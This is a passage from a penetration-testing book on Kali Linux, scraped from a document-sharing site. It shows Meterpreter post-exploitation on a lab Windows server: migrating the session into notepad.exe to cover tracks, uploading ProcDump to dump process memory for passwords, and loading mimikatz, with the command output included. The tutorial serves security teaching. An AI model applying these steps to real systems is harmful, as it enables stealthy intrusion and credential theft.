• Using Meterpreter | 189
    		•

    Learning Kali Linux




    Download 22,59 Mb.
    Pdf ko'rish
    bet174/225
    Sana14.05.2024
    Hajmi22,59 Mb.
    #232856
    1   ...   170   171   172   173   174   175   176   177   ...   225
    Bog'liq
    learningkalilinux

    Process Manipulation
    You will want to do a few things with processes. One of the first things is to migrate
    your connection from the process you compromised. This will help you to cover your
    tracks by getting connected to a less obvious process. As an example, you may
    migrate to an 
    Explorer.EXE
    process or, as in the case of 
    Example 6-12
    , the 
    notepad.exe
    process. To do this process migration, we need to load another post-exploitation
    module. This one is 
    post/windows/manage/migrate
    . It will automatically determine
    another process to migrate to and, as in this case, launch a process if necessary.
    Using Meterpreter | 189

    Example 6-12. Migrating to the notepad.exe process
    meterpreter > run post/windows/manage/migrate
    [
    *
    ]
    Running module against VAGRANT-2008R2
    [
    *
    ]
    Current server process: spoolsv.exe 
    (
    984
    )
    [
    *
    ]
    Spawning notepad.exe process to migrate to
    [
    +
    ]
    Migrating to 6092
    [
    *
    ]
    New server process: notepad.exe 
    (
    6092
    )
    meterpreter >
    We can also look at dumping processes and recovering them. This will provide us
    with anything that may be in memory while the application is running and allow us
    to extract passwords or other sensitive information. To do this, we’re going to 
    upload
    the ProcDump utility from Microsoft’s SysInternals team. We will get a dump file
    from a running process that will capture not only the code of the program but also
    the data from the running program. Before we can get the dump file, though, I have
    procdump64.exe
    staged on my Kali instance so I can upload it. In 
    Example 6-13
    , you
    can see I upload the program I need, which will put it up to the compromised Win‐
    dows system for use later. This required that I use the Meterpreter payload, so I had
    the upload capability. Without it, I would have to resort to relying on other file trans‐
    fer methods.
    Example 6-13. Uploading a program using Meterpreter
    meterpreter > upload procdump64.exe
    [
    *
    ]
    uploading : procdump64.exe -> procdump64.exe
    [
    *
    ]
    uploaded : procdump64.exe -> procdump64.exe
    meterpreter > load mimikatz
    Loading extension mimikatz...Success.
    meterpreter > mimikatz_command -f handle::list
    212
    smss.exe -> 80 
    Process 288 
    csrss.exe
    212
    smss.exe -> 84 
    Process 456 
    lsm.exe
    212
    smss.exe -> 88 
    Process 348 
    csrss.exe
    288
    csrss.exe -> 80 
    Process 340 
    wininit.exe
    288
    csrss.exe -> 180 
    Process 432 
    services.exe
    288
    csrss.exe -> 208 
    Process 448 
    lsass.exe
    288
    csrss.exe -> 224 
    Process 456 
    lsm.exe
    288
    csrss.exe -> 336 
    Process 568 
    svchost.exe
    288
    csrss.exe -> 364 
    Process 332 
    spoolsv.exe
    288
    csrss.exe -> 404 
    Process 644 
    svchost.exe
    288
    csrss.exe -> 444 
    Process 696 
    svchost.exe
    288
    csrss.exe -> 516 
    Process 808 
    svchost.exe
    288
    csrss.exe -> 564 
    Process 868 
    svchost.exe
    288
    csrss.exe -> 588 
    Process 912 
    svchost.exe
    You’ll see that after the program was uploaded, I loaded 
    mimikatz
    again. While there
    are other ways to achieve what I need, I wanted to demonstrate this. The reason is we

    Download 22,59 Mb.
    1   ...   170   171   172   173   174   175   176   177   ...   225




    Download 22,59 Mb.
    Pdf ko'rish